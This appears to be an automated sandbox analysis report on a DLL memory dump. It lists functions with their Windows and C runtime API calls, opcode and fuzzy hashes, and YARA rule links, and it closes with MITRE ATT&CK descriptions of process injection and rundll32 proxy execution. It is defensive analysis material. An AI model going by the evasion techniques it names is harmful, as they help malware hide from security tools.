API String ID: 3615580482-0
Opcode ID: 12663821326a9f2e5950b180b6e61413dbac9387388368d3a1c311f519509ef5
Instruction ID: 3ab5e6c0f968f7b8064a7c71195d861eb018ab1b258d865887b82d180a209e4a
Opcode Fuzzy Hash: 12663821326a9f2e5950b180b6e61413dbac9387388368d3a1c311f519509ef5
Instruction Fuzzy Hash: B34151B1D04219EBDF05DFE5C954BEE77B8BF64304F008569E416AA3A0EB309646CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E812960, Relevance: 6.2, APIs: 4, Instructions: 232COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32(0000FDE9), ref: 6E812B30

Part of subcall function 6E811E20: GetUserDefaultLCID.KERNEL32(?,?,6E812AD3,?,?,?,?,?,?,?,?,?,6E7FE414,?,?,?), ref: 6E811E36

IsValidLocale.KERNEL32(00000000,00000001), ref: 6E812B4A
GetLocaleInfoW.KERNEL32(00000000,00001001,00000000,00000040,00000000,-00000120,00000055,00000000,00000000,?,00000055,00000000), ref: 6E812BB3

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: LocaleValid$CodeDefaultInfoPageUser
String ID:
API String ID: 334263767-0
Opcode ID: e4348aea9a7cba41df143846ebcf0aceda433d1e2120bd63a2c275295cbddac2
Instruction ID: 65c5da323b0e954d6676694cc5fcbbe8245f655e0405facf61701feb8a9f4c99
Opcode Fuzzy Hash: e4348aea9a7cba41df143846ebcf0aceda433d1e2120bd63a2c275295cbddac2
Instruction Fuzzy Hash: A09129B4A0420BDFEB44CFD8C991BEFB7B5AF46304F148918E505AB280D779E941DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E812750, Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(217400E4,20001004,?,00000002,?,?,6E812B0D), ref: 6E81278D
GetACP.KERNEL32(?,?,6E812B0D), ref: 6E8127A1
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E8127D2

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ce678d5457e74f84e5a2356165474164cab5733081dd52546d08ffbb433f9927
Instruction ID: 6394da631ec23fa24138aa538730eb5ea573d4c4e1a98977e57d570a82a4d8de
Opcode Fuzzy Hash: ce678d5457e74f84e5a2356165474164cab5733081dd52546d08ffbb433f9927
Instruction Fuzzy Hash: 39114C7461820AEFDB44CAE5D894EDB7768AB06345F108D58F9099B280F739DA41E790

Uniqueness

Uniqueness Score: -1.00%

Function 6E811E60, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6E812040,00000001), ref: 6E811F09

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 6f1e70739c98c970c26b52c27e408d726b55c1699c31afe52f20f98ad787bb30
Instruction ID: ee8c92724806244640efe0333398b629b113beaa558a3419b564f7298491271b
Opcode Fuzzy Hash: 6f1e70739c98c970c26b52c27e408d726b55c1699c31afe52f20f98ad787bb30
Instruction Fuzzy Hash: B521F7B891820AEFDB04CFD4C594B9DBBB2EB49314F108998E8155B384D775EA85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E811F40, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6E8124E0,00000001), ref: 6E811FB2

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 2fc0365fdf1d05ff01b77b26749af8f3958a2dcf7039ced56bbfc2bbf19d3cee
Instruction ID: 25996b09cbd98f809f01deab07fcacf52c727186dd9a40d5621911987e018de3
Opcode Fuzzy Hash: 2fc0365fdf1d05ff01b77b26749af8f3958a2dcf7039ced56bbfc2bbf19d3cee
Instruction Fuzzy Hash: 601139B4D04209EFDB00CFD4D584B9DB7B6EB49314F208998E8059B380D775AE85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FBC30, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000), ref: 6E7FBC8C

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6c9088bea711a1de9fc6e15918d9ac16b13b2b133a35ce89a14f287758aa7402
Instruction ID: 342702de02c00a5c8fca82b69c7d70854712442688dbf01faff7df5b7fbcd5de
Opcode Fuzzy Hash: 6c9088bea711a1de9fc6e15918d9ac16b13b2b133a35ce89a14f287758aa7402
Instruction Fuzzy Hash: 5F01C875A00208FFCB04DFE9D998E9FB7B9EF88700F108558B9199B250DB30AA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E811DB0, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6E811C70,00000001), ref: 6E811DF7

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 53981f65fee9b7fdfab37a3108c9158a8cac8428d259f0ce87d3fb891ccc2589
Instruction ID: 3afabb838e63ae6da7ee981304ae3ffed17a731de5c7275b0347b9ea275b7e39
Opcode Fuzzy Hash: 53981f65fee9b7fdfab37a3108c9158a8cac8428d259f0ce87d3fb891ccc2589
Instruction Fuzzy Hash: 9FF06D78A04208EBDB00CFD4D945B8ABBB5EB49314F108884E8049B340D772EE94CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FB0B0, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00000000,00000001), ref: 6E7FB0D4

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: bbdef38413c69208c6d1420ac268f61f9cd62df5b4e92e97214b5dc345979681
Instruction ID: b5facccf3ac99eb0f84f697556b65db659af893050bc7c9492d2bc76179691a5
Opcode Fuzzy Hash: bbdef38413c69208c6d1420ac268f61f9cd62df5b4e92e97214b5dc345979681
Instruction Fuzzy Hash: 7AF030F4D04248ABDF00EFF4D85AAADBB7CFB12614F0045A4E80997390EB356A59C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E8CB64D, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.812407657.000000006E8CB000.00000040.00020000.sdmp, Offset: 6E8CB000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 6a74f8a5a6e8526fc9061b5d3d439002aa34f35b09c4fcb5294dfab918a1b021
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 4111D373340A009FDB54CF99DC90E9273DAEB8A630B258866ED04CB359D635EC01C760

Uniqueness

Uniqueness Score: -1.00%

Function 6E8CB942, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.812407657.000000006E8CB000.00000040.00020000.sdmp, Offset: 6E8CB000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: b4d6d5ce5537fa40045d279fc1797393b76eb97f96b27ff299e39c69fcf09e48
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 110100323546458FD744CB69D994E69F7E4EBC3B24B15887EC4468361AE220EC4ACA23

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F47C0, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fa89dcbc29637d2ac05b4a81dd5d1e7e0efd0d5c3ecf96455fa5c90b4eae7d
Instruction ID: cbdb9958fc34b641a6bc404649a0fc3d3653939e1613bffee56f9bfd7aae19da
Opcode Fuzzy Hash: b5fa89dcbc29637d2ac05b4a81dd5d1e7e0efd0d5c3ecf96455fa5c90b4eae7d
Instruction Fuzzy Hash: 97F0A93495D2C8EBDB028AEA83263EA7BB85F43305F0400D8C8901B352E16A850BF7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FE220, Relevance: 28.8, APIs: 19, Instructions: 334COMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E7FE2D4
__invoke_watson_if_error.LIBCMTD ref: 6E7FE2DD
__aligned_msize.LIBCMTD ref: 6E7FE326
__invoke_watson_if_error.LIBCMTD ref: 6E7FE32F

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$__aligned_msize__wcstombs_l
String ID:
API String ID: 2802205028-0
Opcode ID: 2e97db60717a937f047e115b5ee2efd46a7db1361910de1c355c111f47f32ec3
Instruction ID: 9f622e79a3117d647a48023d40e3cac3d616ab871fe489e904562b49fcc37cb2
Opcode Fuzzy Hash: 2e97db60717a937f047e115b5ee2efd46a7db1361910de1c355c111f47f32ec3
Instruction Fuzzy Hash: 6BC1A4B1900209ABDB21CFD4CD44FEE7379AF44709F044899B908BB391EB75AB918F95

Uniqueness

Uniqueness Score: -1.00%

Function 6E806EB0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6E806F8D

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: 75226a3b05e942a8241d6ed0bad81caaf60185991887a18ab0ee0f8c51edfea0
Instruction ID: 20e322a1c3eb01be2f6aff8d3de8599ab5b09b199dab91a08659226fdf26aaf4
Opcode Fuzzy Hash: 75226a3b05e942a8241d6ed0bad81caaf60185991887a18ab0ee0f8c51edfea0
Instruction Fuzzy Hash: 9341E2B5E50204BBDB15EAE89C45FAE3B2D9B90709F104C94F904AF3C2FA75EB104392

Uniqueness

Uniqueness Score: -1.00%

Function 6E814FD0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__aligned_msize.LIBCMTD ref: 6E8150AF
__invoke_watson_if_error.LIBCMTD ref: 6E8150B8
__aligned_msize.LIBCMTD ref: 6E815132
__invoke_watson_if_error.LIBCMTD ref: 6E81513B

Strings

, xrefs: 6E815013

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __aligned_msize__invoke_watson_if_error
String ID:
API String ID: 4254006664-3916222277
Opcode ID: 2632fe927a03ea6c005861931298225da543843863407abf670d13f5645ba18f
Instruction ID: b3b3fd468b6296588d8970d28c71848c7ba66eaf810439eaf95f27c74e7f957c
Opcode Fuzzy Hash: 2632fe927a03ea6c005861931298225da543843863407abf670d13f5645ba18f
Instruction Fuzzy Hash: AE71BFB5904209AFCB00DFD8D995FDEBBB5AF9830CF108858F9046B395D735AA12CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D0AD0, Relevance: 16.7, APIs: 11, Instructions: 227COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6E7D0AE2
__sptype.LIBCMTD ref: 6E7D0B0A
__ctrlfp.LIBCMTD ref: 6E7D0B32
__except2.LIBCMTD ref: 6E7D0B96
__ctrlfp.LIBCMTD ref: 6E7D0BBA
__copysign.LIBCMTD ref: 6E7D0C4A
__except2.LIBCMTD ref: 6E7D0C71
__except2.LIBCMTD ref: 6E7D0CCE
__except2.LIBCMTD ref: 6E7D0D13

Part of subcall function 6E8010D0: __raise_exc.LIBCMTD ref: 6E801143
Part of subcall function 6E8010D0: __errcode.LIBCMTD ref: 6E80114F
Part of subcall function 6E8010D0: __umatherr.LIBCMTD ref: 6E80119C

__except2.LIBCMTD ref: 6E7D0D70

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __except2$__ctrlfp$__copysign__errcode__raise_exc__sptype__umatherr
String ID:
API String ID: 2970023028-0
Opcode ID: 02ff56c5dd12c78120d8a95c44c293b7cfe18b878607ba067a4189d1feacf297
Instruction ID: bdf256040e7abfdebc2c14eda90154f5fb1b9b731842f831078dece93af37dcf
Opcode Fuzzy Hash: 02ff56c5dd12c78120d8a95c44c293b7cfe18b878607ba067a4189d1feacf297
Instruction Fuzzy Hash: 8A811471C1490DEBDB00BFE9EE496ADBB75FB49309F0049A8E9C425188EB71427C8796

Uniqueness

Uniqueness Score: -1.00%

Function 6E819A50, Relevance: 13.8, APIs: 9, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6E81AB41,?,00000006,?), ref: 6E819A88
__fassign.LIBCMTD ref: 6E819BB3
__fassign.LIBCMTD ref: 6E819C0D
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,6E81AB41,00000005,00000000,00000000), ref: 6E819D10
WriteFile.KERNEL32(?,6E81AB41,00000000,?,00000000), ref: 6E819D4D
GetLastError.KERNEL32 ref: 6E819D57

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __fassign$ByteCharConsoleErrorFileLastMultiWideWrite
String ID:
API String ID: 3321916596-0
Opcode ID: 30ec28eeefee4dff7bf4c36648660b62feb81b85c54d4bf54922651e94f200c9
Instruction ID: 26c0651293a006d1d4b2bcc5512e5ca612d3ed1ce86e96fcb9784bdc04d76eba
Opcode Fuzzy Hash: 30ec28eeefee4dff7bf4c36648660b62feb81b85c54d4bf54922651e94f200c9
Instruction Fuzzy Hash: 13E12674A14209DFCB08CFA8D591ADEBBF1BF89304F24C559E909AB385D731E942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C51B0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 293COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E7C61A2,?,?,?,?,?,?,?,6E7F94CC,00000002,?,00000000), ref: 6E7C51F0
__invoke_watson_if_error.LIBCMTD ref: 6E7C5293

Strings

@, xrefs: 6E7C52BC
@, xrefs: 6E7C535F

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: a9741c3a03101bd03a305766ef0cd03252857c375d6f37b9537b256945425849
Instruction ID: 16afad0f41eee6155102a0363cc4883dee73d74f673cb6eefdf68612ffbc51cf
Opcode Fuzzy Hash: a9741c3a03101bd03a305766ef0cd03252857c375d6f37b9537b256945425849
Instruction Fuzzy Hash: B9D19CB0900229EFDB24DFD4DD48BDAB378EB44B05F0045E9E5096A2A0E7719BC5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C4CE0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 6E7C4D20
__invoke_watson_if_error.LIBCMTD ref: 6E7C4DC3

Strings

@, xrefs: 6E7C4E80
@, xrefs: 6E7C4DEC

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 73b3adb512b4aecb229e93c9c8a4c8edf3442a489eab976f8f83791cd703edfb
Instruction ID: a78908b36188e3f7daa75d7249ddcb791b4ccb76ba45174c407f6a5a791b48cf
Opcode Fuzzy Hash: 73b3adb512b4aecb229e93c9c8a4c8edf3442a489eab976f8f83791cd703edfb
Instruction Fuzzy Hash: E4D19FB0900219DFDB24CF94CD4DBDA77B9EB69705F0044E9E6096A390E3709AD5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D08F0, Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6E7D097A
__sptype.LIBCMTD ref: 6E7D09AD
__ctrlfp.LIBCMTD ref: 6E7D09D5
__ctrlfp.LIBCMTD ref: 6E7D09EE
__ctrlfp.LIBCMTD ref: 6E7D0A07
__except1.LIBCMTD ref: 6E7D0A37

Part of subcall function 6E800FD0: __raise_exc.LIBCMTD ref: 6E801031
Part of subcall function 6E800FD0: __errcode.LIBCMTD ref: 6E80103D
Part of subcall function 6E800FD0: __umatherr.LIBCMTD ref: 6E801089

__except1.LIBCMTD ref: 6E7D0A8A

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __ctrlfp$__except1$__errcode__raise_exc__sptype__umatherr
String ID:
API String ID: 2036792732-0
Opcode ID: 260dc2a3de2c90374a004a557de5a9d3507b606a73cf143e305adc6d351e3144
Instruction ID: 4804d09a303e3f5129bbb22d1fb479d076f84b4129f811bf63374e8d86ffa30a
Opcode Fuzzy Hash: 260dc2a3de2c90374a004a557de5a9d3507b606a73cf143e305adc6d351e3144
Instruction Fuzzy Hash: 0341F3B4D4050EEBDB40EFE8ED0ABAD7B35AF45309F1049A0E984292C4EB71566CC792

Uniqueness

Uniqueness Score: -1.00%

Function 6E804060, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

", xrefs: 6E804209
*, xrefs: 6E804177
", xrefs: 6E80433D
*, xrefs: 6E80435C

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID:
String ID: "$"$*$*
API String ID: 0-3534430112
Opcode ID: ecf85e905d979f9e4217546df59f0ad501c02550c9de6c62eec40ecb10678b9d
Instruction ID: d94a3e8f70335d2a646f62b22df0fa1e06fbe7f7c713fcfdbc7ab2be281899f1
Opcode Fuzzy Hash: ecf85e905d979f9e4217546df59f0ad501c02550c9de6c62eec40ecb10678b9d
Instruction Fuzzy Hash: 609161B0990209EFDB10DFD0CC58BEE77B8AF95709F108958E5106B3D0D7B59A86CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C3DD0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

UnDecorator::getTemplateName.LIBVCRUNTIMED ref: 6E7C3E44
und_strncmp.LIBCMTD ref: 6E7C3EC4
DName::getString.LIBCMTD ref: 6E7C3F59
Replicator::isFull.LIBCMTD ref: 6E7C4093

Strings

@, xrefs: 6E7C3E75

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: Decorator::getFullNameName::getReplicator::isStringTemplateund_strncmp
String ID: @
API String ID: 1106836056-2766056989
Opcode ID: c82da287e6347222fde8fcfbb9941f30bde11a78c8a1abcab32d1effa6460aae
Instruction ID: 7ea0db89fadd73ce419d1d7e4f61bf48d849dafd9cfbb3815e184e8794593858
Opcode Fuzzy Hash: c82da287e6347222fde8fcfbb9941f30bde11a78c8a1abcab32d1effa6460aae
Instruction Fuzzy Hash: 25919071900508EFCF05DFE4E998AEE77B9BF5A708F0048AAD505A7260EB346D45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E800400, Relevance: 9.4, APIs: 6, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3d94b7ba6ba06b2a1b06f8a958c735b6336f4392280e6704668f85244ed9eb
Instruction ID: 7f3caff64e49ca20d24ad5a4b8ef0629fed14f1c599b235ffdd04ca19fddd8af
Opcode Fuzzy Hash: 4c3d94b7ba6ba06b2a1b06f8a958c735b6336f4392280e6704668f85244ed9eb
Instruction Fuzzy Hash: 6A020370910209EFDB14CFD8C994BEEB7B5BF45B14F108A19E4656B2D0E734AA46CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6E8077A0, Relevance: 9.3, APIs: 6, Instructions: 317COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 6E80781C
__wcstombs_l.LIBCMTD ref: 6E807861
MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 6E8078D6

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: ByteCharMultiWide$__wcstombs_l
String ID:
API String ID: 1695508394-0
Opcode ID: e01f4b5b9953b764241c6a8ce51ccfe14ae3e1851a77d6c6f1aa595b266ce857
Instruction ID: cf86e2e78dda052dba9b510242e8b6fd0f35e5b60712d287dcd390c6969aed86
Opcode Fuzzy Hash: e01f4b5b9953b764241c6a8ce51ccfe14ae3e1851a77d6c6f1aa595b266ce857
Instruction Fuzzy Hash: CBC116B1E00209EFDB04EFD8DD94BEEB7B8BF48344F104958E505AB294DB71AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D0570, Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6E7D0587
__sptype.LIBCMTD ref: 6E7D05AF
__ctrlfp.LIBCMTD ref: 6E7D05D7
__ctrlfp.LIBCMTD ref: 6E7D05ED
__except1.LIBCMTD ref: 6E7D0621

Part of subcall function 6E800FD0: __raise_exc.LIBCMTD ref: 6E801031
Part of subcall function 6E800FD0: __errcode.LIBCMTD ref: 6E80103D
Part of subcall function 6E800FD0: __umatherr.LIBCMTD ref: 6E801089

__ctrlfp.LIBCMTD ref: 6E7D0646

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __ctrlfp$__errcode__except1__raise_exc__sptype__umatherr
String ID:
API String ID: 2015137074-0
Opcode ID: 80430ef8a45518db381fa738880c90d4d34cfc15a980d4f7ee6bf0058979ae9e
Instruction ID: 09f8be3fb959ce1e2eea7f63b614466f9d21f4a8a16a802389af849d4c745680
Opcode Fuzzy Hash: 80430ef8a45518db381fa738880c90d4d34cfc15a980d4f7ee6bf0058979ae9e
Instruction Fuzzy Hash: D921D371C4050DEBCB10AFE8ED4A4AC7B75EF49305F1049B4F9985A284EA74866CD752

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FFC10, Relevance: 7.8, APIs: 5, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc780ae50a61fdddb821982a53eb41d6949de4023fddea00f30bb7b845a23e50
Instruction ID: e73806e310ed4150aefa955fd6ac2e75407b03a44265efa06a74f377490cc8d5
Opcode Fuzzy Hash: cc780ae50a61fdddb821982a53eb41d6949de4023fddea00f30bb7b845a23e50
Instruction Fuzzy Hash: 78B10870900209EFDB08CFD4CA94BEDB7B5FF45714F208568E425AB3A4DB74AA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FDBF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

U, xrefs: 6E7FDC16

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 6163f9f665b766da8d0725b29c9e733828771de79d845cfc104d98660effe7f3
Instruction ID: 6b7d7ed3117f31bae3acf0dcc2472805fdefed88858066e45f0cb3c4a50e8ab8
Opcode Fuzzy Hash: 6163f9f665b766da8d0725b29c9e733828771de79d845cfc104d98660effe7f3
Instruction Fuzzy Hash: 0A11C475D14208FFCB00DAE8CE49F8E7778AB4470AF108994F609BB352E6719752CB99

Uniqueness

Uniqueness Score: -1.00%

Function 6E81A460, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 6E81A5B0
GetLastError.KERNEL32 ref: 6E81A5C5
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6E81A655
GetLastError.KERNEL32 ref: 6E81A65F

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: ErrorLast$ByteCharFileMultiWideWrite
String ID:
API String ID: 3971981585-0
Opcode ID: 328c80fb7cd7363f775fdb812e2c1ef380ae061e0079f9993f3c7cbea4fe035c
Instruction ID: ca654bc93694b5af233fc359967ad7d84e01b96a6c91ea056ba444774799e273
Opcode Fuzzy Hash: 328c80fb7cd7363f775fdb812e2c1ef380ae061e0079f9993f3c7cbea4fe035c
Instruction Fuzzy Hash: 7871AEB4A042299FCB24CF58C980AD9B7B5BB48344F5485E9E90DA7364D730AEC5CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E8075F0, Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,00000000,00000000), ref: 6E807652
__wcstombs_l.LIBCMTD ref: 6E8076A7
MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000), ref: 6E80773A
GetStringTypeW.KERNEL32(?,00000000), ref: 6E80777A

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: ByteCharMultiWide$StringType__wcstombs_l
String ID:
API String ID: 2895191225-0
Opcode ID: c0910d1c47f5f6bf45148a2cf0bd12f75a2e7be62c41b90dbfd84020a0b0377e
Instruction ID: 4619d8f28538bc7d7127b76955e74541b93abe421c0d112bf5ac2010a708dc37
Opcode Fuzzy Hash: c0910d1c47f5f6bf45148a2cf0bd12f75a2e7be62c41b90dbfd84020a0b0377e
Instruction Fuzzy Hash: B8511BB1910208EFDB04DFE4CD99BEEB7B8BF04744F004958E516A7290EB35AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E804D70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

__aligned_msize.LIBCMTD ref: 6E804F23
__invoke_watson_if_error.LIBCMTD ref: 6E804F2C

Strings

d, xrefs: 6E804F8B

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __aligned_msize__invoke_watson_if_error
String ID: d
API String ID: 4254006664-2564639436
Opcode ID: 854785d74ce5e6ca308dc37e981e989fe2d881d65aa321287baae54d14682fcc
Instruction ID: eecbe86446e10f2c1f813aea2dc77ce2645fb59ef7ff70f50b59d0528412bc94
Opcode Fuzzy Hash: 854785d74ce5e6ca308dc37e981e989fe2d881d65aa321287baae54d14682fcc
Instruction Fuzzy Hash: DDA15B70A04248EFCB04CFD8C990BADBBB5AF89304F248599E9146B391C735AF41DB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

